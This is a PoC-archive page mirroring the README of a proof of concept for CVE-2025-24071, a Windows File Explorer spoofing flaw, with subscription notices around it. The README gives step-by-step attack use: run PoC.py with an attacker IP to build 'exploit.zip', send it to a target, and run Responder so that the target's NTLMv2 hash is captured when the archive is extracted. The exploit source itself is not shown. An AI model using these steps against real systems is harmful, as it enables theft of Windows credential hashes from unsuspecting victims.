Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24071 PoC — Microsoft Windows File Explorer Spoofing Vulnerability

Source
Associated Vulnerability
Title:Microsoft Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)
Description:Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.
Description
A PoC of CVE-2025-24071, A windows vulnerability that allow get NTMLv2 hashes
Readme
# CVE-2025-24071_PoC
## Usage
- Execute the script
```bash
python PoC.py test 192.168.1.45
```
![image](https://github.com/user-attachments/assets/591de1a3-8c0f-42af-907d-c7c246efb2b3)

- Send "exploit.zip" to the target, and then you can use [Responder](https://github.com/SpiderLabs/Responder) in order to recive the NTLMv2 hash
```bash
sudo python3 responder.py -I ens33
```
![image](https://github.com/user-attachments/assets/61649a3c-5bbd-4b29-a665-63ca6cf8e73f)

- Now when the target extract the file `.zip`, Boom! we get the NTLM hashes

![til](usecase.gif)
File Snapshot

[4.0K] /data/pocs/9e2871e598048012d4f1b7cc4f03b5ee5948013c ├── [2.3K] PoC.py ├── [ 586] README.md └── [2.2M] usecase.gif 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →